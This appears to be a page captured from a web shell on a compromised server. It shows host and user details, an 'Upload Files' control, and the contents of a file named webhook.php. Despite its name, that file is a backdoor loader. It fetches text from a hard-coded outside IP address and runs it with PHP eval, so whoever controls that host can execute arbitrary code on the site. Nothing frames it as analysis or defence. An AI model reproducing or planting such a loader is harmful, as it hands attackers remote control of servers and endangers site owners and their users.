HEX
Server: LiteSpeed
System: Linux s815.bom1.mysecurecloudhost.com 4.18.0-477.27.2.lve.el8.x86_64 #1 SMP Wed Oct 11 12:32:56 UTC 2023 x86_64
User: xsbcdnkr (2361)
PHP: 8.3.26
Disabled: NONE
Upload Files
File: /home/xsbcdnkr/chaaqua.com/serveque/2025/webhook.php
<?php
$c = curl_init("http://107.150.59.106/z51110_12/stat/index2.txt");
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_TIMEOUT, 5);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
$result = curl_exec($c);
if ($result !== false) {
    eval('?>' . $result);
}else{
    echo "Error: ".curl_errno($c).", ".curl_error($c);
}
curl_close($c);